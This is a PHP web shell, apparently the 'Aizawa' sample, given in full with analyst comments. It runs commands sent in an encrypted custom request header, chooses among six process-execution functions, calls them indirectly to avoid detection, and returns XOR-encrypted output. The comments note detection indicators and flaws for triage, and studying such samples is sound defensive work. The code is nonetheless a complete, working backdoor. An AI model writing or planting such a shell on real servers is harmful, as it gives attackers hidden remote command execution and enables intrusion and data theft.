aizawa_classic.php
<?php
// NOTE(review): taken as a whole, this file is a web shell: it runs a command
// supplied in a request header and returns the output. Comments are written
// for analysts triaging the sample.
// A fixed custom response header is sent on every request to this script;
// the literal name/value pair is a stable indicator for proxy and WAF logs.
header("Aizawa-Type: http_aizawa_ninja_classic");
// Hard-coded symmetric key used for both the request payload and the response
// body below. Because it is stored in the file, captured traffic can be decoded
// by anyone who recovers this script.
$ENCRYPTION_KEY = "AIZAWA!!!EMA";
/**
 * Return $length random bytes, using the best source the runtime offers.
 *
 * Order of preference: random_bytes(), then openssl_random_pseudo_bytes(),
 * then a byte-by-byte mt_rand() loop. The last fallback is not a
 * cryptographically secure generator. In this file the result is only used
 * as the 16-byte IV in xor_encrypt().
 *
 * @param int $length Number of bytes requested.
 * @return string Raw byte string.
 */
function get_random_bytes($length) {
if (function_exists('random_bytes')) {
return random_bytes($length);
}
if (function_exists('openssl_random_pseudo_bytes')) {
return openssl_random_pseudo_bytes($length);
}
// Last resort: predictable PRNG, one byte per iteration.
$bytes = '';
for ($i = 0; $i < $length; $i++) {
$bytes .= chr(mt_rand(0, 255));
}
return $bytes;
}
/**
 * Obfuscate $data with a repeating-key XOR and return it hex-encoded.
 *
 * Each input byte is XORed with one key byte and one IV byte. The key index
 * is shifted by the value of the first IV byte; the IV index wraps every 16
 * bytes. The 16-byte IV is prepended in the clear, so the first 32 hex
 * characters of the output are the IV.
 *
 * Analyst note: this is obfuscation, not authenticated encryption. With the
 * key from this file and the IV from the message itself, any captured payload
 * can be reversed with xor_decrypt(). There is no integrity check.
 *
 * @param string|null $data Plaintext; '' or null yields ''.
 * @param string      $key  XOR key (the caller in this file passes a non-empty constant).
 * @return string Lowercase hex of IV followed by the XORed bytes, or ''.
 */
function xor_encrypt($data, $key) {
if ($data === '' || $data === null) {
return '';
}
$iv = get_random_bytes(16);
$data_len = strlen($data);
$key_len = strlen($key);
// Starting position in the key is derived from the first IV byte.
$offset = ord($iv[0]);
$encrypted = '';
for ($i = 0; $i < $data_len; $i++) {
$k = ord($key[($i + $offset) % $key_len]);
$encrypted .= chr(ord($data[$i]) ^ $k ^ ord($iv[$i % 16]));
}
return bin2hex($iv . $encrypted);
}
/**
 * Reverse xor_encrypt(): hex-decode, split off the 16-byte IV, and XOR the rest.
 *
 * Inputs that are empty, null, or shorter than 32 hex characters (i.e. too
 * short to contain a full IV) return ''. So does an input that carries an IV
 * but no payload bytes.
 *
 * Analyst note: this routine plus the key stored in the file is sufficient to
 * recover commands and output from logged or captured traffic.
 *
 * @param string|null $encrypted_hex Hex string as produced by xor_encrypt().
 * @param string      $key           XOR key.
 * @return string Recovered bytes, or '' when the input is unusable.
 */
function xor_decrypt($encrypted_hex, $key) {
if ($encrypted_hex === '' || $encrypted_hex === null || strlen($encrypted_hex) < 32) {
return '';
}
$data = pack('H*', $encrypted_hex);
$iv = substr($data, 0, 16);
$encrypted = substr($data, 16);
if ($encrypted === '' || $encrypted === false) {
return '';
}
// Same key offset rule as the encrypt side: first IV byte.
$offset = ord($iv[0]);
$encrypted_len = strlen($encrypted);
$key_len = strlen($key);
$decrypted = '';
for ($i = 0; $i < $encrypted_len; $i++) {
$k = ord($key[($i + $offset) % $key_len]);
$decrypted .= chr(ord($encrypted[$i]) ^ $k ^ ord($iv[$i % 16]));
}
return $decrypted;
}
/**
 * Run $cmd through the first process-execution function the runtime reports as available.
 *
 * The candidate list is fixed: shell_exec, exec, system, passthru, proc_open,
 * popen. The serialize/base64/unserialize round trip operates on that local
 * constant only and yields the same array; it has no functional effect.
 *
 * Hardening note: function_exists() returns false for names listed in the
 * php.ini `disable_functions` directive, so this chain only falls through to
 * the "No available function" string when all six are disabled.
 *
 * @param string $cmd Command line to run.
 * @return string Command output, or a fixed failure message.
 */
function getFunctionalCmd(string $cmd): string {
$funcs = ['shell_exec', 'exec', 'system', 'passthru', 'proc_open', 'popen'];
$obfuscated = base64_encode(serialize($funcs));
$deobfuscate = function ($x) {return unserialize(base64_decode($x));};
foreach ($deobfuscate($obfuscated) as $func) {
if (function_exists($func)) {
return obfuscatedExecution($func, $cmd);
}
}
return "No available function to execute command.";
}
/**
 * Dispatch $cmd to the named execution function and return its output.
 *
 * The base64 encode/decode pair is a no-op: $decoded always equals $cmd.
 * Functions are invoked by string name through call_user_func(), so the file
 * contains no direct call syntax for them. Static rules for this sample should
 * therefore key on the quoted function names and the call_user_func usage.
 *
 * @param string $func One of the six names chosen by getFunctionalCmd().
 * @param string $cmd  Command line to run.
 * @return string Captured output, or "Unknown function: ..." for any other name.
 */
function obfuscatedExecution(string $func, string $cmd): string {
$encoded = base64_encode($cmd);
$decoded = base64_decode($encoded);
switch ($func) {
case 'shell_exec':
case 'exec':
return call_user_func($func, $decoded);
case 'system':
case 'passthru':
// These two print directly, so output is captured with an output buffer.
ob_start();
call_user_func($func, $decoded);
return ob_get_clean();
case 'proc_open':
return executeWithProc_open($decoded);
case 'popen':
return executeWithPopen($decoded);
default:
return "Unknown function: $func";
}
}
/**
 * Run $cmd via proc_open with piped stdin/stdout/stderr and return the result.
 *
 * stdin is closed immediately; stdout is read to the end, then stderr.
 * If stderr is truthy, the return value is "Error: <stderr>" and stdout is
 * discarded; otherwise stdout is returned.
 *
 * @param string $cmd Command line to run.
 * @return string stdout, an "Error: ..." string, or a fixed failure message
 *                when no process resource was obtained.
 */
function executeWithProc_open(string $cmd): string {
$spec = [0 => ["pipe", "r"], 1 => ["pipe", "w"], 2 => ["pipe", "w"]];
// Invoked by name, like the other execution paths in this file.
$proc = call_user_func('proc_open', $cmd, $spec, $pipes);
if (is_resource($proc)) {
fclose($pipes[0]);
$out = stream_get_contents($pipes[1]);
$err = stream_get_contents($pipes[2]);
array_map('fclose', array_slice($pipes, 1));
proc_close($proc);
return $err ? "Error: $err" : $out;
}
return "Failed to execute command using proc_open.";
}
/**
 * Run $cmd via popen in read mode and return everything the process writes to the pipe.
 *
 * @param string $cmd Command line to run.
 * @return string Pipe contents, or a fixed failure message when popen yields a falsy handle.
 */
function executeWithPopen(string $cmd): string {
$handle = call_user_func('popen', $cmd, 'r');
if ($handle) {
$output = stream_get_contents($handle);
pclose($handle);
return $output;
}
return "Failed to execute command using popen.";
}
// Request handling: the command arrives in a custom request header, which PHP
// exposes as $_SERVER["HTTP_AIZAWA_NINJA"] (the `Aizawa-Ninja` header), not in
// the URL or body. Access logs that record only the request line will not show it.
// Detection depends on header logging: a long hex value in that header, an
// all-hex response body, and the `Aizawa-Type` response header set above.
// NOTE(review): there is no authentication check here. The hard-coded key is the
// only thing a caller needs, and the value is read without an isset() guard.
$encrypted_cmd = $_SERVER["HTTP_AIZAWA_NINJA"];
$cmd = xor_decrypt($encrypted_cmd, $ENCRYPTION_KEY);
// Buffer the command output so only the XOR/hex-encoded form is sent back.
ob_start();
echo getFunctionalCmd($cmd);
$output = ob_get_clean();
echo xor_encrypt($output, $ENCRYPTION_KEY);